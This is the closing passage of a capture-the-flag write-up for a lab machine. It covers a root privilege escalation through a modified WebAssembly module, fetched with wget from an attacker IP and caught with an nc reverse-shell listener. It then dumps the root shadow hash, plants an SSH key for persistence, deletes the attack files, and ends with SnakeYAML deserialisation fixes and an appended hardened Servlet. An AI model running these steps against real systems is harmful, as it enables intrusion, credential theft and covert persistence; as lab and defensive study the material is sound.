1))</code></span></span></p></div></li><li id="https://www.notion.so/caabbbf9320c4aa989c8c34ef0f58627" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">wat2wasm</code></span><span class="SemanticString">, recompile 
the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">main.wasm</code></span><span class="SemanticString"> binary:</span></span><div id="https://www.notion.so/6411015201ca4bcf894cab426bd8c6c7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ wat2wasm main.wat && mv main.wasm ./www</code></span></span></p></div></li><li id="https://www.notion.so/8c4f0120a7634300a79be4fca7c8ef11" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Download the edited </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">main.wasm</code></span><span class="SemanticString"> to our temporary directory:</span></span><div id="https://www.notion.so/d1e10ab9f3764d1fbf1cdea190277097" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ wget http://10.10.14.103:8000/main.wasm</code></span></span></p></div></li><li id="https://www.notion.so/04059aa5e4434f0294163179855ecb6f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Listen for a reverse shell on port 4444:</span></span><div id="https://www.notion.so/65c942e9bd6241a7ae125cee92330151" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 4444</code></span></span></p></div></li><li id="https://www.notion.so/2de05e08e75e4c3798db1391786913f0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">While in our temporary directory, run as 
sudo:</span></span><div id="https://www.notion.so/394a911e4b02436a8e1ebe1b67138754" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo /usr/bin/go run /opt/wasm-functions/index.go</code></span></span></p></div></li><li id="https://www.notion.so/c7bdaba01a604a2db4d9a06e336850d2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We should then get a shell as root:</span></span><div id="https://www.notion.so/2439a472f70947fda9927571b763ae75" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ whoami && id</code></span></span></p></div><pre id="https://www.notion.so/98d0821641fe4a769c0ca094e46140ec" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root
uid=0(root) gid=0(root) groups=0(root)</span></span></span></code></pre></li><li id="https://www.notion.so/d747688cbf774365896373ba1c0d388b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get root flag!</span></span></li></ul><h2 id="https://www.notion.so/76113525210c4c50910dc08ee44c07f3" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/76113525210c4c50910dc08ee44c07f3"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Post-exploitation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/bde5afc190994ba982205a03d0f39ac0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Decompiling </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Servlet.class</code></span><span class="SemanticString"> in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/opt/tomcat/webapps/yaml/WEB-INF/classes/</code></span><span class="SemanticString"> with Procyon:</span></span><div id="https://www.notion.so/6674ff6f3cf74b7283b9e95a43ed8d1d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ procyon Servlet.class -o .</code></span></span></p></div></li><li id="https://www.notion.so/77b0949930d84a218656521571b519cf" 
class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Servlet.java</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/d594ab18fa604efa94d04b6cc42581f3" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token annotation punctuation">@WebServlet</span><span class="token punctuation">(</span>name <span class="token operator">=</span> <span class="token string">"Servlet"</span><span class="token punctuation">)</span>
<span class="token keyword">public</span> <span class="token keyword">class</span> <span class="token class-name">Servlet</span> <span class="token keyword">extends</span> <span class="token class-name">HttpServlet</span>
<span class="token punctuation">{</span>
<span class="token keyword">protected</span> <span class="token keyword">void</span> <span class="token function">doPost</span><span class="token punctuation">(</span><span class="token keyword">final</span> <span class="token class-name">HttpServletRequest</span> request<span class="token punctuation">,</span> <span class="token keyword">final</span> <span class="token class-name">HttpServletResponse</span> response<span class="token punctuation">)</span> <span class="token keyword">throws</span> <span class="token class-name">ServletException</span><span class="token punctuation">,</span> <span class="token class-name">IOException</span> <span class="token punctuation">{</span>
<span class="token keyword">final</span> <span class="token class-name">String</span> f <span class="token operator">=</span> request<span class="token punctuation">.</span><span class="token function">getParameter</span><span class="token punctuation">(</span><span class="token string">"data"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">final</span> <span class="token class-name">Yaml</span> yaml <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Yaml</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">final</span> <span class="token class-name">Object</span> obj <span class="token operator">=</span> yaml<span class="token punctuation">.</span><span class="token function">load</span><span class="token punctuation">(</span>f<span class="token punctuation">)</span><span class="token punctuation">;</span>
response<span class="token punctuation">.</span><span class="token function">getWriter</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">append</span><span class="token punctuation">(</span><span class="token string">"Due to security reason this feature has been temporarily on hold. We will soon fix the issue!"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token keyword">protected</span> <span class="token keyword">void</span> <span class="token function">doGet</span><span class="token punctuation">(</span><span class="token keyword">final</span> <span class="token class-name">HttpServletRequest</span> request<span class="token punctuation">,</span> <span class="token keyword">final</span> <span class="token class-name">HttpServletResponse</span> response<span class="token punctuation">)</span> <span class="token keyword">throws</span> <span class="token class-name">ServletException</span><span class="token punctuation">,</span> <span class="token class-name">IOException</span> <span class="token punctuation">{</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span></span></span></span></code></pre></li><li id="https://www.notion.so/e107645b5f20400b8d1a21dd60aba226" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We see that the YAML input </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">f</code></span><span class="SemanticString"> is still being deserialised insecurely, before the error response is even sent back to the user:</span></span><pre id="https://www.notion.so/4500a2859ed945e29aa4b7fb8dd56feb" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">final</span> <span class="token class-name">Object</span> obj <span class="token operator">=</span> yaml<span class="token punctuation">.</span><span class="token function">load</span><span class="token punctuation">(</span>f<span class="token punctuation">)</span><span class="token punctuation">;</span></span></span></span></code></pre></li><li id="https://www.notion.so/aef487804b2546c78f677008b240c2cf" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Patching this would simply have been a matter of editing one line of code:</span></span><pre id="https://www.notion.so/f10b808dbbc146fab0f5b087fd3ac058" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">protected</span> <span class="token keyword">void</span> <span class="token function">doPost</span><span class="token punctuation">(</span><span class="token keyword">final</span> <span class="token class-name">HttpServletRequest</span> request<span class="token punctuation">,</span> <span class="token keyword">final</span> <span class="token class-name">HttpServletResponse</span> response<span class="token punctuation">)</span> <span class="token keyword">throws</span> <span class="token 
class-name">ServletException</span><span class="token punctuation">,</span> <span class="token class-name">IOException</span> <span class="token punctuation">{</span>
<span class="token keyword">final</span> <span class="token class-name">String</span> f <span class="token operator">=</span> request<span class="token punctuation">.</span><span class="token function">getParameter</span><span class="token punctuation">(</span><span class="token string">"data"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">final</span> <span class="token class-name">Yaml</span> yaml <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Yaml</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">Constructor</span><span class="token punctuation">(</span><span class="token class-name">SafeClass</span><span class="token punctuation">.</span><span class="token keyword">class</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// using safe constructor</span>
<span class="token keyword">final</span> <span class="token class-name">Object</span> obj <span class="token operator">=</span> yaml<span class="token punctuation">.</span><span class="token function">load</span><span class="token punctuation">(</span>f<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span></span></span></span></code></pre></li></ul><h2 id="https://www.notion.so/e31d18dcae354279b51f370023d07ecd" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/e31d18dcae354279b51f370023d07ecd"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Persistence</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/6101b95a5a444823854d59e3c2a24461" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get root user's hash from </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/shadow</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/864d80bfaf7640a9b12634e3dd8c2748" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root:$6$oPgtRE0IgWrXKitG$Z5FyXxEXm5l.skZbIBKm0poPFPUxgZVY5DPii0DFsQgSBiL98ioRBuHDVzOHaZCgH.xyLnpGIksHlfBXC4LQo/:18554:0:99999:7:::</span></span></span></code></pre></li><li id="https://www.notion.so/83b5f9845e084f029f7fa568536015ec" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Maintaining access by adding our public key to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/root/.ssh/authorized_keys</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/67173dd8e4b448f88c0cedee82e96c53" 
class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo "ssh-rsa ..." > ~/.ssh/authorized_keys</code></span></span></p></div></li><li id="https://www.notion.so/349f562fca87405f9b8eab19294d9a9e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Clean up after ourselves:</span></span><div id="https://www.notion.so/37ef57ecfe684c7789bba4656fcddb3e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ rm /dev/shm/rev.sh /dev/shm/shell.py /dev/shm/main.wasm /dev/shm/deploy.sh</code></span></span></p></div></li></ul><h2 id="https://www.notion.so/6dcb0fe7e8474cc1bd16644a7377b370" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/6dcb0fe7e8474cc1bd16644a7377b370"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Resources</span></span></h2><ol class="NumberedListWrapper"><li id="https://www.notion.so/5d6e9c5bfba743e3a4d4f9fdb83ef992" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" 
href="https://www.appmarq.com/public/security,1039056,Avoid-insecure-use-of-YAML-deserialization-when-using-SnakeYaml-JEE">https://www.appmarq.com/public/security,1039056,Avoid-insecure-use-of-YAML-deserialization-when-using-SnakeYaml-JEE</a></span></span></li><li id="https://www.notion.so/10dfb9b288bf492983d1989fea0ba581" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/mbechler/marshalsec/blob/master/marshalsec.pdf">https://github.com/mbechler/marshalsec/blob/master/marshalsec.pdf</a></span></span></li><li id="https://www.notion.so/9982417a81d64b5cbddcfadf9087cc56" class="NumberedList" value="3"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858">https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858</a></span></span></li><li id="https://www.notion.so/7246afac060349fe81fe9957a8651bb0" class="NumberedList" value="4"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/artsploit/yaml-payload">https://github.com/artsploit/yaml-payload</a></span></span></li><li id="https://www.notion.so/fb7ea6060fc8416490402c180b0c7125" class="NumberedList" value="5"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://webassembly.github.io/wabt/demo/wasm2wat/index.html">https://webassembly.github.io/wabt/demo/wasm2wat/index.html</a></span></span></li><li id="https://www.notion.so/7abd38f24d30418296813ac88fe2e05a" class="NumberedList" value="6"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" 
href="https://webassembly.github.io/wabt/demo/wat2wasm/index.html">https://webassembly.github.io/wabt/demo/wat2wasm/index.html</a></span></span></li></ol></article>
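Added example, not code from the page or from the box: a hardened version of the decompiled Servlet from the Post-exploitation section that parses the `data` parameter with SnakeYAML's SafeConstructor, which constructs only standard YAML types (maps, lists, scalars) and rejects every application-class tag anywhere in the document with a ConstructorException, a stricter setting than binding the document root to one class as in the one-line patch above. It assumes the javax.servlet API the decompiled class uses and a SnakeYAML release whose SafeConstructor takes a LoaderOptions (1.33 or 2.x); the size limit is a constructed value.

```java
import java.io.IOException;

import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

@WebServlet(name = "Servlet")
public class Servlet extends HttpServlet {
    // Upper bound on the YAML we are willing to parse (constructed value, not from the page).
    private static final int MAX_YAML_CHARS = 64 * 1024;

    // Parse untrusted YAML with SafeConstructor: only plain YAML types are built,
    // so a document such as "!!javax.script.ScriptEngineManager [...]" is refused
    // with a ConstructorException instead of instantiating the named class.
    static Object parseUntrusted(String input) {
        LoaderOptions options = new LoaderOptions();
        options.setAllowDuplicateKeys(false);
        Yaml yaml = new Yaml(new SafeConstructor(options));
        return yaml.load(input);
    }

    @Override
    protected void doPost(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        String data = request.getParameter("data");
        if (data == null || data.length() > MAX_YAML_CHARS) {
            response.sendError(HttpServletResponse.SC_BAD_REQUEST,
                    "missing or oversized 'data' parameter");
            return;
        }

        Object parsed;
        try {
            parsed = parseUntrusted(data);
        } catch (YAMLException e) {
            // ConstructorException (unknown or forbidden tag) and syntax errors both
            // extend YAMLException; neither reaches the application as an object.
            response.sendError(HttpServletResponse.SC_BAD_REQUEST, "invalid YAML");
            return;
        }

        response.setContentType("text/plain");
        response.getWriter().append("parsed a "
                + (parsed == null ? "null document" : parsed.getClass().getSimpleName()));
    }
}
```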
<footer class="Footer">
<div>[email protected]~$</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank" rel="noopener noreferrer">Notablog</a>.</div>
</footer>
</body>
</html>